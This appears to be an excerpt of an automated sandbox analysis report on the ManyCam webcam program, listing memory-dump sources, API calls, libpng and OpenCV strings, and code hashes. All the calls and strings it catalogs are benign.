                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: clock$AllocatorBase::Concurrency::details::Concurrency::task_options::get_schedulerDebugHeapPolicyScheduler
                                                                                                                                            • String ID: CVideoProcessor::InsertEffectToStack$Inserting effect %s to stack at position %d.$Inserting effect %s\%s\%s to stack at position %d.
                                                                                                                                            • API String ID: 1896687067-3121683814
                                                                                                                                            • Opcode ID: 2f379fbdc71ef8fe106dd6932f9e4df42c7bfac42d585d9b32fea62b007a0ea8
                                                                                                                                            • Instruction ID: 105fcc333d0e6ff14583993c1dd746094cb4f3fab98b4d368d8a839d86cc259d
                                                                                                                                            • Opcode Fuzzy Hash: 2f379fbdc71ef8fe106dd6932f9e4df42c7bfac42d585d9b32fea62b007a0ea8
                                                                                                                                            • Instruction Fuzzy Hash: 56B12B70900208EFCB14DFA8C891BDEBBB5BF59314F10825EE419AB391DB74AE45CB95
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sprintf$??2@
                                                                                                                                            • String ID: %4d$P%c%d %d255
                                                                                                                                            • API String ID: 4280736075-1612107885
                                                                                                                                            • Opcode ID: 717b4f879f489a06cce3eedcd6c5f624da0432e249c714acf67fedf5a8425281
                                                                                                                                            • Instruction ID: 52aafc5a6815b4ee309980448047afe73af146c58305f0352dd99719570430ee
                                                                                                                                            • Opcode Fuzzy Hash: 717b4f879f489a06cce3eedcd6c5f624da0432e249c714acf67fedf5a8425281
                                                                                                                                            • Instruction Fuzzy Hash: E061F7725083554BCB00DF28E990A6BBBD1FFD5308F1946ADE895AB302D735EE05C792
                                                                                                                                            APIs
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 004F68AB
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 004F68DB
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 004F6903
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 004F692B
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB139
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB155
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB171
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1A3
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1D6
                                                                                                                                            • ??0CxImage@@QAE@K@Z.CXIMAGECRT(00000000,000000FF,?,?,?,?,?,?,?,?,?,00000000,?,00000001,7EC02BB4), ref: 004F696D
                                                                                                                                              • Part of subcall function 004CB5F0: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 004CB626
                                                                                                                                              • Part of subcall function 004CB5F0: _wmkdir.MSVCR80 ref: 004CB633
                                                                                                                                              • Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
                                                                                                                                              • Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA
                                                                                                                                              • Part of subcall function 004164A0: FindFirstFileW.KERNEL32(00000000,00000104,000000D8,00000104,00000000), ref: 004164F5
                                                                                                                                            Strings
                                                                                                                                            • \ManyCam\BackgroundEffect, xrefs: 004F69A8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeap$FileFindFirstFolderImage@@PathSpecial_wmkdir
                                                                                                                                            • String ID: \ManyCam\BackgroundEffect
                                                                                                                                            • API String ID: 711174743-980167294
                                                                                                                                            • Opcode ID: be2178804a92c928cd2aed66c8cbe30649dd095b03b0f11a4b1ac172dfbbafa9
                                                                                                                                            • Instruction ID: 1d1004133df218b0561d43129003d36592f772ef424460559cb02d2d1cb950c8
                                                                                                                                            • Opcode Fuzzy Hash: be2178804a92c928cd2aed66c8cbe30649dd095b03b0f11a4b1ac172dfbbafa9
                                                                                                                                            • Instruction Fuzzy Hash: 5E8189B0901258DEDB14EF64DC41BDEBBB6AB94308F0081DEE449A3281DB795B98CF95
                                                                                                                                            APIs
                                                                                                                                            • _setjmp3.MSVCR80 ref: 00B9A4F0
                                                                                                                                            • fopen.MSVCR80 ref: 00B9A50C
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(00000000,?,?,?,?,?,?,?,00000008,00000000,00000000,00000000,00000000), ref: 00B9A59B
                                                                                                                                            • fclose.MSVCR80 ref: 00B9A5FB
                                                                                                                                            • ??3@YAXPAX@Z.MSVCR80(00000000), ref: 00B9A605
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??2@??3@_setjmp3fclosefopen
                                                                                                                                            • String ID: 1.2.8
                                                                                                                                            • API String ID: 1448151454-509886058
                                                                                                                                            • Opcode ID: 58655c9e129085ec41108ee9c6a20397193b7464521d98872fe8addf944e97ac
                                                                                                                                            • Instruction ID: 5e8c62ec32e2cbc2179d1d4e82f67f57668a9c073fa53d55ef0db67275c8cae7
                                                                                                                                            • Opcode Fuzzy Hash: 58655c9e129085ec41108ee9c6a20397193b7464521d98872fe8addf944e97ac
                                                                                                                                            • Instruction Fuzzy Hash: 7B4151B5E002487BCF10ABA58C86DEFBBBCEB95310F1444A9F905A7301EA75DA50C7A1
                                                                                                                                            APIs
                                                                                                                                            • _setjmp3.MSVCR80 ref: 00B9A4F0
                                                                                                                                            • fopen.MSVCR80 ref: 00B9A50C
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(00000000,?,?,?,?,?,?,?,00000008,00000000,00000000,00000000,00000000), ref: 00B9A59B
                                                                                                                                            • fclose.MSVCR80 ref: 00B9A5FB
                                                                                                                                            • ??3@YAXPAX@Z.MSVCR80(00000000), ref: 00B9A605
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??2@??3@_setjmp3fclosefopen
                                                                                                                                            • String ID: 1.2.8
                                                                                                                                            • API String ID: 1448151454-509886058
                                                                                                                                            • Opcode ID: a54194875eba67d9e458d1066f34c32be45fd3867720cafb0e9453c1875fb9f9
                                                                                                                                            • Instruction ID: 8ac282a5aacb311b734be9b421d1c3a63f229bce3a11cc1f981abae15370a703
                                                                                                                                            • Opcode Fuzzy Hash: a54194875eba67d9e458d1066f34c32be45fd3867720cafb0e9453c1875fb9f9
                                                                                                                                            • Instruction Fuzzy Hash: 204162B5E002497BCF149BA58C86DFFBBB8EB95300F1444A9F905E3301EA75DA40C7A1
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000001,?,100B0000), ref: 00B94B50
                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,?,?,?,Left,00000000,?,?,?), ref: 00B94B8C
                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,Top,00000000,?,?,?,?,?,?,?,?,Left,00000000,?,?,?), ref: 00B94BA9
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,Left,00000000,?,?,?), ref: 00B94BEF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: QueryValue$CloseOpen
                                                                                                                                            • String ID: Left$Top
                                                                                                                                            • API String ID: 1586453840-3873733008
                                                                                                                                            • Opcode ID: 3b26b932dab8921c743f2ad06d4754258250316ca5855a7a964d0617cbbdc234
                                                                                                                                            • Instruction ID: dc8cb443beed96370610917b6757ff24bee588cae2ed5a6b46e61a73a7a92cfe
                                                                                                                                            • Opcode Fuzzy Hash: 3b26b932dab8921c743f2ad06d4754258250316ca5855a7a964d0617cbbdc234
                                                                                                                                            • Instruction Fuzzy Hash: 52318071108301ABD714CF28D9A1B9BBBE9EBC8704F108A6EF585C7290D770D949CB92
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • Application is running with png.c from libpng-%.20s, xrefs: 00BB1120
                                                                                                                                            • The info struct allocated by application for reading is too small., xrefs: 00BB1174
                                                                                                                                            • Application was compiled with png.h from libpng-%.20s, xrefs: 00BB10FD
                                                                                                                                            • The png struct allocated by the application for reading is too small., xrefs: 00BB1148
                                                                                                                                            • 1.2.8, xrefs: 00BB1117
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sprintf
                                                                                                                                            • String ID: 1.2.8$Application is running with png.c from libpng-%.20s$Application was compiled with png.h from libpng-%.20s$The info struct allocated by application for reading is too small.$The png struct allocated by the application for reading is too small.
                                                                                                                                            • API String ID: 590974362-206690659
                                                                                                                                            • Opcode ID: 9a5021fbd38b1344e13a01aebb51c2536a0cf90b6cce9addcbdf851f5119147f
                                                                                                                                            • Instruction ID: 1e15c76ac68aa7b9891b97c3ea374e3ba842014aaad657a198c5e21c5d47ac29
                                                                                                                                            • Opcode Fuzzy Hash: 9a5021fbd38b1344e13a01aebb51c2536a0cf90b6cce9addcbdf851f5119147f
                                                                                                                                            • Instruction Fuzzy Hash: 4B21ACB29483005BD200EB59DC91CBBF7E9FFD4704F400989F68057362EAB2E845CBA2
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • The png struct allocated by the application for writing is too small., xrefs: 00BB8EF8
                                                                                                                                            • Application is running with png.c from libpng-%.20s, xrefs: 00BB8ED0
                                                                                                                                            • The info struct allocated by the application for writing is too small., xrefs: 00BB8F24
                                                                                                                                            • Application was compiled with png.h from libpng-%.20s, xrefs: 00BB8EAD
                                                                                                                                            • 1.2.8, xrefs: 00BB8EC7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sprintf
                                                                                                                                            • String ID: 1.2.8$Application is running with png.c from libpng-%.20s$Application was compiled with png.h from libpng-%.20s$The info struct allocated by the application for writing is too small.$The png struct allocated by the application for writing is too small.
                                                                                                                                            • API String ID: 590974362-2898919677
                                                                                                                                            • Opcode ID: e19127e34bf6f9d1a6e545a52261fe2387f5eb3ea9e6651e3e4e9296bebf1af4
                                                                                                                                            • Instruction ID: 5b5c4d46d9bd47317aa0d1fd66d6bd948a4b9fc6eb3d0d5d4002f2cfc16a9369
                                                                                                                                            • Opcode Fuzzy Hash: e19127e34bf6f9d1a6e545a52261fe2387f5eb3ea9e6651e3e4e9296bebf1af4
                                                                                                                                            • Instruction Fuzzy Hash: 2E218CB29443049BD610EB59DC81CBBF7EDBFE8704F000999F54457362EAB5E845CBA2
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: fprintf
                                                                                                                                            • String ID: %s: $FALSE$TRUE$field[%2d] %5lu, %2d, %2d, %d, %2d, %5s, %5s, %s
                                                                                                                                            • API String ID: 383729395-878487725
                                                                                                                                            • Opcode ID: dc60fba129f866763bb32e2792318939ec962e69feea231afe1184dc0b62955a
                                                                                                                                            • Instruction ID: ac5eb207fe338860870bf9b4cf519eafb3fcc3ff39cd2c49f64dd14b4ea06737
                                                                                                                                            • Opcode Fuzzy Hash: dc60fba129f866763bb32e2792318939ec962e69feea231afe1184dc0b62955a
                                                                                                                                            • Instruction Fuzzy Hash: 221161762002516BC308CF56EC98E77FBE9EF89711B15C1A9FA499B322D730E815C7A0
                                                                                                                                            APIs
                                                                                                                                            • cvError.CXCORE099(000000E5,cvMoveWindow,NULL name,.\window_w32.cpp,000002D0), ref: 00B954D2
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00B954F3
                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00B9551B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$ErrorMoveRect
                                                                                                                                            • String ID: .\window_w32.cpp$NULL name$cvMoveWindow
                                                                                                                                            • API String ID: 3407777569-1568378838
                                                                                                                                            • Opcode ID: 740b9336a07af99edbbca72eeaf4f8f02fdfe36256ac5dba6640bbdb01d8c30d
                                                                                                                                            • Instruction ID: 59b8f1d3e25cd672b5000b9386e42bfd3d5efba7d4f554678bf85c74ca06a3a8
                                                                                                                                            • Opcode Fuzzy Hash: 740b9336a07af99edbbca72eeaf4f8f02fdfe36256ac5dba6640bbdb01d8c30d
                                                                                                                                            • Instruction Fuzzy Hash: B0F0D6715447116FCA20EF1CCC81D6BB3E8EB84B10F444A88F889A3255E630EC0487E2
                                                                                                                                            APIs
                                                                                                                                            • cvError.CXCORE099(000000E5,cvDestroyWindow,NULL name string,.\window_w32.cpp,000001E4), ref: 00B94E7F
                                                                                                                                            • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00B94EA6
                                                                                                                                            • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00B94EAF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$Error
                                                                                                                                            • String ID: .\window_w32.cpp$NULL name string$cvDestroyWindow
                                                                                                                                            • API String ID: 3527474480-1091922320
                                                                                                                                            • Opcode ID: 8bcf77553336b4f1facc1e8a90aef005a5fc13de9f349d68717f9a459b4dc0f9
                                                                                                                                            • Instruction ID: 75d87f5743071485838c0d113dd078c9337e154e321a2777237cd424d64c5256
                                                                                                                                            • Opcode Fuzzy Hash: 8bcf77553336b4f1facc1e8a90aef005a5fc13de9f349d68717f9a459b4dc0f9
                                                                                                                                            • Instruction Fuzzy Hash: CEE0657278432037DD207615BC02F9A57D89B84F10F1605E5F7407B2E2E6E0F84145A8
                                                                                                                                            APIs
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(?), ref: 00B9B997
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(?), ref: 00B9B9B1
                                                                                                                                            • _setjmp3.MSVCR80 ref: 00B9B9F8
                                                                                                                                            • memset.MSVCR80 ref: 00B9BB4F
                                                                                                                                            • ??3@YAXPAX@Z.MSVCR80(?), ref: 00B9BF0D
                                                                                                                                            • ??3@YAXPAX@Z.MSVCR80(?), ref: 00B9BF23
                                                                                                                                              • Part of subcall function 00B96CF0: memcpy.MSVCR80(?,?,?), ref: 00B96D3A
                                                                                                                                              • Part of subcall function 00B94200: memset.MSVCR80 ref: 00B94235
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??2@??3@memset$_setjmp3memcpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2276023410-0
                                                                                                                                            • Opcode ID: c557f193fbb21fcb5aaf8077c8a2a024fb6f18c66aea99d5e41ee36c283db011
                                                                                                                                            • Instruction ID: 13d60f7c79c473cae942b4d1eee44d832442c59515560091cff7a666dd6b5ab3
                                                                                                                                            • Opcode Fuzzy Hash: c557f193fbb21fcb5aaf8077c8a2a024fb6f18c66aea99d5e41ee36c283db011
